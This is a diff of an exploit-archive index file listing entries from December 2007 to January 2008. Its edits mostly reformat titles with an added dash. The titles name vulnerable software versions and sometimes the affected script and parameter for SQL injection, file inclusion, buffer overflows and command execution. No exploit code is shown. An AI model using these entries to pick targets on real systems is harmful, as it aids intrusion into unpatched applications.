-4799,platforms/php/webapps/4799.txt,"Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 +4799,platforms/php/webapps/4799.txt,"Joovili <= 3.0.6 - (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 showCode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 4802,platforms/php/webapps/4802.txt,"XCMS <= 1.82 - Remote Local File Inclusion",2007-12-28,nexen,php,webapps,0 @@ -4458,22 +4458,22 @@ id,file,description,date,author,platform,type,port 4813,platforms/php/webapps/4813.txt,"XCMS <= 1.83 - Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS Remote File Upload / Disclosure Vulnerabilities",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 -4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 -4817,platforms/php/webapps/4817.txt,"w-Agora <= 4.2.1 (cat) Remote SQL Injection",2007-12-30,IHTeam,php,webapps,0 +4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 +4817,platforms/php/webapps/4817.txt,"w-Agora <= 4.2.1 - (cat) Remote SQL Injection",2007-12-30,IHTeam,php,webapps,0 4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module inotes6.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 4819,platforms/windows/remote/4819.html,"Macrovision Installshield isusweb.dll SEH Overwrite Exploit",2007-12-30,Elazar,windows,remote,0 4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module dwa7w.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 -4821,platforms/php/webapps/4821.txt,"IPTBB <= 0.5.4 (viewdir id) Remote SQL Injection",2007-12-31,MhZ91,php,webapps,0 -4822,platforms/php/webapps/4822.txt,"MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0 -4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0 +4821,platforms/php/webapps/4821.txt,"IPTBB <= 0.5.4 - (viewdir id) Remote SQL Injection",2007-12-31,MhZ91,php,webapps,0 +4822,platforms/php/webapps/4822.txt,"MyPHP Forum <= 3.0 - (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0 +4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 - (rss.php albumnr) Remote SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0 -4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 +4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 - (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade <= 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service PoC",2008-01-02,anonymous,windows,dos,0 4830,platforms/php/webapps/4830.txt,"ClipShare (uprofile.php UID) Remote SQL Injection",2008-01-02,Krit,php,webapps,0 -4831,platforms/php/webapps/4831.txt,"MyPHP Forum <= 3.0 (Final) Remote SQL Injection",2008-01-03,The:Paradox,php,webapps,0 +4831,platforms/php/webapps/4831.txt,"MyPHP Forum <= 3.0 - (Final) Remote SQL Injection",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School <= 2.4.10 - Remote Blind SQL Injection Exploit",2008-01-03,EgiX,php,webapps,0 4833,platforms/php/webapps/4833.txt,"NetRisk <= 1.9.7 - Remote/Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 4834,platforms/php/webapps/4834.txt,"samPHPweb (db.php commonpath) Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 @@ -4484,16 +4484,16 @@ id,file,description,date,author,platform,type,port 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0 4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0 -4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 +4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - RFI",2008-01-06,"Eugene Minaev",php,webapps,0 4848,platforms/asp/webapps/4848.txt,"portalapp 4.0 - (SQL/XSS/auth bypasses) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 -4849,platforms/php/webapps/4849.txt,"LoudBlog <= 0.6.1 (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 +4849,platforms/php/webapps/4849.txt,"LoudBlog <= 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 -4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 +4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (XSS/SQL) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 4853,platforms/php/webapps/4853.php,"DCP-Portal <= 6.11 - Remote SQL Injection Exploit",2008-01-06,x0kster,php,webapps,0 4854,platforms/php/webapps/4854.txt,"SineCMS <= 2.3.5 - Local File Inclusion / RCE Vulnerabilities",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 @@ -4503,57 +4503,57 @@ id,file,description,date,author,platform,type,port 4858,platforms/php/webapps/4858.pl,"FlexBB <= 0.6.3 Cookies Remote SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 4859,platforms/php/webapps/4859.txt,"EkinBoard <= 1.1.0 - Remote File Upload / Auth Bypass Vulnerabilities",2008-01-07,"Eugene Minaev",php,webapps,0 4860,platforms/php/webapps/4860.pl,"Eggblog <= 3.1.0 Cookies Remote SQL Injection Exploit",2008-01-07,"Eugene Minaev",php,webapps,0 -4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 +4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL/XSS) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 -4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 +4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 4870,platforms/php/webapps/4870.txt,"osData <= 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password Exploit",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 -4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 +4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 - pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 -4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 +4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 - (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 4882,platforms/php/webapps/4882.txt,"MTCMS <= 2.0 - Remote SQL Injection Vulnerabilities",2008-01-10,"Virangar Security",php,webapps,0 -4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 (index.php page) Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 +4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - (index.php page) Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 4884,platforms/php/webapps/4884.php,"Evilsentinel <= 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 -4885,platforms/windows/dos/4885.txt,"Quicktime Player <= 7.3.1.70 (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 +4885,platforms/windows/dos/4885.txt,"Quicktime Player <= 7.3.1.70 - (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 4886,platforms/php/webapps/4886.pl,"iGaming CMS <= 1.3.1/1.5 - Remote SQL Injection Exploit",2008-01-11,"Eugene Minaev",php,webapps,0 -4887,platforms/php/webapps/4887.htm,"DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit",2008-01-11,j0j0,php,webapps,0 -4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 (index.php cat) Remote SQL Injection",2008-01-11,MhZ91,php,webapps,0 +4887,platforms/php/webapps/4887.htm,"DigitalHive <= 2.0 RC2 - (user_id) Remote SQL Injection Exploit",2008-01-11,j0j0,php,webapps,0 +4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - (index.php cat) Remote SQL Injection",2008-01-11,MhZ91,php,webapps,0 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion Vulnerabilities",2008-01-11,k1n9k0ng,php,webapps,0 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 unset() bug Remote SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 -4891,platforms/php/webapps/4891.php,"Docebo <= 3.5.0.3 (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 -4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit",2008-01-11,shinnai,windows,local,0 +4891,platforms/php/webapps/4891.php,"Docebo <= 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 +4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Exploit",2008-01-11,shinnai,windows,local,0 4893,platforms/linux/dos/4893.c,"Linux Kernel <= 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit",2008-01-11,"Clemens Kurtenbach",linux,dos,0 4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit",2008-01-11,Elazar,windows,remote,0 -4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 (id) Remote SQL Injection",2008-01-11,"Raw Security",php,webapps,0 +4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - (id) Remote SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 -4897,platforms/php/webapps/4897.pl,"photokron <= 1.7 (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 -4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 (articlecat) SQL Injection",2008-01-12,ka0x,php,webapps,0 +4897,platforms/php/webapps/4897.pl,"photokron <= 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 +4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! <= 0.6.1 - Remote SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injection Vulnerabilities",2008-01-12,trew,asp,webapps,0 -4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 (userName) Remote SQL Injection",2008-01-12,ka0x,php,webapps,0 +4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - (userName) Remote SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - BoF Exploit",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder (nid) Remote Blind SQL Injection",2008-01-13,JosS,php,webapps,0 -4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit",2008-01-13,Pr0metheuS,php,webapps,0 +4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) Remote SQL Injection Exploit",2008-01-13,Pr0metheuS,php,webapps,0 4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 - rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0 -4907,platforms/php/webapps/4907.py,"X7 Chat <= 2.0.5 (day) Remote SQL Injection Exploit",2008-01-14,nonroot,php,webapps,0 -4908,platforms/php/webapps/4908.pl,"Xforum 1.4 (topic) Remote SQL Injection Exploit",2008-01-14,j0j0,php,webapps,0 +4907,platforms/php/webapps/4907.py,"X7 Chat <= 2.0.5 - (day) Remote SQL Injection Exploit",2008-01-14,nonroot,php,webapps,0 +4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) Remote SQL Injection Exploit",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 4910,platforms/asp/webapps/4910.pl,"RichStrong CMS (showproduct.asp cat) Remote SQL Injection Exploit",2008-01-14,JosS,asp,webapps,0 4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0 -4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 (delete id) Remote Admin Bypass",2008-01-15,ka0x,php,webapps,0 +4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - (delete id) Remote Admin Bypass",2008-01-15,ka0x,php,webapps,0 4913,platforms/windows/remote/4913.html,"Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) Remote SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) Remote SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 @@ -4561,39 +4561,39 @@ id,file,description,date,author,platform,type,port 4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance (CamPanel.dll 2.1.0.2) BoF Exploit",2008-01-16,rgod,windows,remote,0 4919,platforms/php/webapps/4919.txt,"blogcms 4.2.1b - (SQL/XSS) Multiple Vulnerabilities",2008-01-16,DSecRG,php,webapps,0 -4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 (effect.php page) Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 -4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps,0 +4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 - (effect.php page) Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 +4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - (ASP.NET) Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps,0 4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Remote Blind SQL Injection Exploit",2008-01-16,Silentz,php,webapps,0 -4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 -4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 +4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - (Search) Remote SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 +4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 - (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) <= 1.2.10 - Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"mybulletinboard (mybb) <= 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 -4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 (id) Remote SQL Injection",2008-01-17,Stack,php,webapps,0 -4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 (upload.php language) LFI",2008-01-17,Scary-Boys,php,webapps,0 -4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 +4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - (id) Remote SQL Injection",2008-01-17,Stack,php,webapps,0 +4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) LFI",2008-01-17,Scary-Boys,php,webapps,0 +4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications (RtspVaPgCtrl) Remote BoF Exploit",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service RPC BoF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 rtlabel_id2name() Local Null Pointer Dereference DoS",2008-01-18,Hunger,bsd,dos,0 -4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 -4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 +4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 +4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - (.dsr) File Handling BoF Exploit",2008-01-18,shinnai,windows,local,0 4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - Remote SQL Injection",2008-01-19,"websec Team",php,webapps,0 -4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 +4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Auth Bypass",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 explorerdir.php Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 -4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 +4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL/fd) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BoF Exploit",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen <= 5.0.2 AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit",2008-01-21,prdelka,windows,remote,0 4949,platforms/windows/remote/4949.txt,"Citadel SMTP <= 7.10 - Remote Overflow Exploit",2008-01-21,prdelka,windows,remote,25 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - Remote SQL Injection Exploit",2008-01-21,bazik,php,webapps,0 -4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 -4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 +4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 +4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure",2008-01-21,shinmai,php,webapps,0 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 @@ -4603,29 +4603,29 @@ id,file,description,date,author,platform,type,port 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe (categoryid) Remote SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery <= 1.4.14 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 -4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 (setcms.org) Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 +4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 4963,platforms/php/webapps/4963.pl,"YaBB SE <= 1.5.5 - Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 -4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 +4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4965,platforms/php/webapps/4965.php,"PHP-Nuke <= 8.0 Final (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4966,platforms/php/webapps/4966.pl,"Invision Gallery <= 2.0.7 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 -4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 (index.php story) Remote SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 (voircom.php id) Remote SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) Remote SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - (voircom.php id) Remote SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums <= 9.07 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 -4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 -4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 